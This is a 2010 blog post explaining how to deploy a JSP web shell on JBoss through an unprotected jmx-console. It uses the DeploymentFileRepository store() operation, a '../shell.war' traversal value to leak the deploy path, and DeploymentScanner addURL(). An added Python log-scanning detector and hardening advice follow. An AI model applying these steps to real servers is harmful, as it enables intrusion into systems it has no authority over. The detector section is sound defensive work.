Friday, June 25, 2010

The curious case of JBoss Hacking

Hi everyone.

Today I'd like to talk about hacking JBoss.

There are lots of resources on the net about it, but hopefully this article will help you when you hit a dead end because the configuration is not so standard.

The prerequisite is that you have access to the jmx-console as admin.
It is not rare to see JBoss installations where the jmx-console is not password protected.

Well now what...

You would like to shovel your nice shell by using the addURL() function in the DeploymentScanner, but suddenly you think wtf... the victim machine cannot connect to my web server on any port (no reverse, only bind allowed).

There is a workaround as described in this very detailed and nice paper:

http://www.redteam-pentesting.de/publications/jboss (read it before going any further)

The technique described there uses another JBoss class, DeploymentFileRepository, at:


http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository


and its very useful store() function.
Sometimes things go wrong anyway: after posting your JSP code, you realize that it doesn't get deployed by JBoss.
This happens because the path where your directory (say, shell.war) resides is not in the DeploymentScanner's URL list, so the hot deployment fails.
The solution is to find out where your directory is by inducing a server error:

Function description:

void store()

MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
p2 java.lang.String (no description)
p3 java.lang.String (no description)
p4 java.lang.String (no description)
p5 boolean True False (no description)

Expected values:
p1 = shell.war (your dir name)
p2 = shell (name of the jsp file containing the code)
p3 = .jsp (extension)
p4 = (jsp code)
p5 = true

Error-inducing values:
p1 = ../shell.war
p2 = shell
p3 = .jsp
p4 =
p5 = true

Next, check the following line in the resulting error:

java.lang.IllegalArgumentException: child '../helpme.war' should be a child of parent '/prd/jboss/bws/web/bws106/./deploy/management'
org.jboss.console.manager.DeploymentFileRepository.getFile(DeploymentFileRepository.java:151)

The path '/prd/jboss/bws/web/bws106/deploy/management' is where your shell.war resides.
Now that we know it, we only have to use the addURL() function of the DeploymentScanner class.

So head to:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

Function description:

void addURL()

MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)


The URL to enter in the addURL() form is:
file:/prd/jboss/bws/web/bws106/deploy/management/

Note the trailing slash.

Now call your shell by loading the following url:

http://host:8080/shell/shell.jsp
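
Seen from the defending side, each step above leaves a trace: unauthenticated jmx-console hits, requests naming the two MBeans, and the IllegalArgumentException in the server log. The following added example (not part of the original post) scans for all three; the log layouts (access logging enabled in Common Log Format), the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# MBean names taken from the two inspectMBean URLs in the post.
WATCHED = {
    "jboss.admin:service=DeploymentFileRepository": "DeploymentFileRepository MBean requested",
    "jboss.deployment:type=DeploymentScanner,flavor=URL": "DeploymentScanner MBean requested",
}
# Common Log Format: host ident user [time] "METHOD path PROTO" status size
CLF = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Error text quoted in the post, logged when store() gets a path outside its base directory.
TRAVERSAL = re.compile(r"IllegalArgumentException: child '([^']*)' should be a child of parent '([^']*)'")

# Constructed sample data (not from a real system).
ACCESS_SAMPLE = [
    '203.0.113.7 - - [25/Jun/2010:10:01:02 +0200] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository HTTP/1.1" 200 5120',
    '203.0.113.7 - - [25/Jun/2010:10:03:40 +0200] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL HTTP/1.1" 200 9800',
    '198.51.100.4 - admin [25/Jun/2010:10:05:00 +0200] "GET /jmx-console/ HTTP/1.1" 200 30000',
]
SERVER_SAMPLE = [
    "10:02:11,120 ERROR [STDERR] java.lang.IllegalArgumentException: child '../helpme.war' should be a child of parent '/prd/jboss/bws/web/bws106/./deploy/management'",
]


def scan_access_log(lines):
    """Return (line_no, client, reason) for jmx-console requests worth reviewing."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = CLF.match(line)
        if not m or not m.group(4).startswith("/jmx-console"):
            continue
        client, user, _method, path, status = m.groups()
        if user == "-" and status == "200":  # no authenticated user, yet served
            findings.append((no, client, "jmx-console served without authentication"))
        for mbean, reason in WATCHED.items():
            if mbean in unquote(path):  # MBean names arrive URL-encoded
                findings.append((no, client, reason))
    return findings


def scan_server_log(lines):
    """Return (line_no, child, parent) for each path-probing error in server.log."""
    return [(no, *m.groups()) for no, line in enumerate(lines, 1)
            if (m := TRAVERSAL.search(line))]


if __name__ == "__main__":
    for finding in scan_access_log(ACCESS_SAMPLE) + scan_server_log(SERVER_SAMPLE):
        print(finding)
```

Any hit of the first kind means the prerequisite of this post is met on that host, so password-protecting or removing the jmx-console is the fix that matters.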

Bye for now...